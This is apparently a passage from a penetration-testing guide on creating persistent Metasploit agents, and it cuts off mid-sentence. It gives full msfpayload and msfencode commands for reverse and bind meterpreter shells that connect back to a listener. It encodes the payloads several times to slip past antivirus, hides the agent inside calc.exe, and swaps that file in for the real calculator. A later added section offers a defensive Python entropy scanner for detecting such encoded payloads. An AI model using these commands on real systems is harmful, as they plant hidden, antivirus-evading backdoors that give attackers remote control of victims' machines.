Let's discuss creating a persistent agent using Metasploit. The Metasploit Framework can also be used to create a stand-alone executable that will persist on a compromised system and allow interactive communications. The benefit of creating a persistent agent with Metasploit is that it can be prepared and tested in advance to ensure connectivity, and encoded to bypass local antivirus software.
Create persistent agent using Metasploit
To make a simple stand-alone agent, launch msfconsole at a command prompt in Kali.
Use msfpayload to craft the persistence agent. In the example shown in the following screenshot, the agent is configured to use a reverse_tcp shell that will connect back to the local host at 192.168.43.130 on port 4444. The agent, named attack1.exe, will use a win32 executable template.
The stand-alone agent will only work on compromised systems with no antivirus installed, or if the antivirus has first been disabled using the appropriate meterpreter command. To bypass the antivirus, the backdoor must be encoded. There are several different options for encoding the payload, as shown in the following screenshot:
To see the available options, use the show encoders command.
Metasploit uses approximately 30 different encoders; by default, it will select the most appropriate encoder if one is not specified.
A good general encoder to use is shikata_ga_nai. This encoder implements polymorphic XOR additive feedback encoding against a four-byte key, and it is the only encoder ranked as "excellent" by Metasploit.
To encode the previously prepared attack.exe agent, we use the following command:
msf>msfencode -i attack.exe -o encoded_attack.exe -e x86/shikata_ga_nai -c 5 -t exe
This encodes the attack.exe agent five times using the shikata_ga_nai encoder. Each time it is re-encoded, it becomes harder to detect. However, the executable also increases in size. The full payload can be created directly from the command line in Kali. Not only can it be encoded, but we can configure the encoding pattern to avoid certain characters. For example, the following characters should be avoided when encoding a persistent agent because they may result in discovery and failure of the attack:
- \x00 represents a zero-byte address (the null terminator)
- \x0a represents a line feed
- \x0d represents a carriage return
To create a multi-encoded payload, use the following command:
msf>msfpayload windows/meterpreter/bind_tcp LPORT=444 R| msfencode -e x86/shikata_ga_nai -c 5 -t raw -a x86 -b '\x00\x0a\x0d' -c 5 -x /root/Desktop/attack.exe -o /root/Desktop/encoded_attack.exe
You can also encode the msfpayload output into an existing executable, and both the modified executable and the persistent agent will function. To bind the persistent agent to an executable such as a calculator (calc.exe), first copy the appropriate calc.exe file into Metasploit's template folder, located at /usr/share/metasploit-framework/data/templates. When the template is in place, use the following command:
msf>msfpayload windows/meterpreter/bind_tcp LPORT=444 R| msfencode -t exe -x calc.exe -k -o encoded_calc_attack.exe -e x86/shikata_ga_nai -c 5
The agent can be placed on the target system, renamed calc.exe to replace the original calculator, and then executed.
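From the defender's side, the encoded executables described above share a measurable trait: repeated XOR feedback encoding leaves the payload body looking close to uniformly random, i.e. near 8 bits of entropy per byte, while ordinary code and text sit far lower. The following Python script is an added illustration, not part of the original text or of Metasploit itself; it computes Shannon entropy over fixed-size windows and reports the regions that exceed a threshold. The sample inputs are constructed inline (a plain-text buffer and a deterministic pseudo-random blob standing in for an encoded payload), and the 256-byte window and 7.0-bit threshold are assumptions to be tuned against your own baseline of known-good binaries.

```python
import hashlib
import math
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Shannon entropy in bits per byte: 0.0 for empty or single-valued input, 8.0 for uniform bytes."""
    if not data:
        return 0.0
    n = len(data)
    return -sum((c / n) * math.log2(c / n) for c in Counter(data).values())


def high_entropy_windows(data: bytes, window: int = 256, threshold: float = 7.0):
    """Return (offset, entropy) for every fixed-size window whose entropy reaches the threshold.

    A trailing fragment shorter than half a window is skipped, because entropy
    estimates on very short samples are unreliable.
    """
    hits = []
    for off in range(0, len(data), window):
        chunk = data[off:off + window]
        if len(chunk) < window // 2:
            break
        e = shannon_entropy(chunk)
        if e >= threshold:
            hits.append((off, round(e, 2)))
    return hits


def scan_file(path: str, window: int = 256, threshold: float = 7.0):
    """Triage helper: read a file and return its high-entropy regions."""
    with open(path, "rb") as fh:
        return high_entropy_windows(fh.read(), window, threshold)


def _constructed_random_blob(n: int, seed: bytes = b"constructed-seed") -> bytes:
    """Deterministic pseudo-random bytes (SHA-256 chain) used only as a stand-in for an encoded payload body."""
    out, block = b"", seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return out[:n]


# Constructed samples: readable text versus a key-stream-like blob of the kind an XOR encoder produces.
PLAIN = b"The quick brown fox jumps over the lazy dog. " * 40
ENCODED_LIKE = _constructed_random_blob(1024)


if __name__ == "__main__":
    print("plain text entropy     :", round(shannon_entropy(PLAIN), 2))
    print("encoded-like entropy   :", round(shannon_entropy(ENCODED_LIKE), 2))
    print("plain high-entropy hits:", high_entropy_windows(PLAIN))
    print("blob high-entropy hits :", high_entropy_windows(ENCODED_LIKE))
```

High entropy on its own is a triage signal, not a verdict: compressed resources, embedded certificates and legitimately packed installers also score near 8 bits per byte. The useful pattern is to combine this check with a known-good hash comparison, which also catches the case the text describes where a system binary such as calc.exe has been replaced by a renamed agent.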
Unfortunately, nearly all Metasploit-encoded executables can be detected by client antivirus software. This has been attributed to penetration testers who have submitted encoded payloads to sites such as VirusTotal. However, you can create an executable and then encrypt it using Veil-Evasion,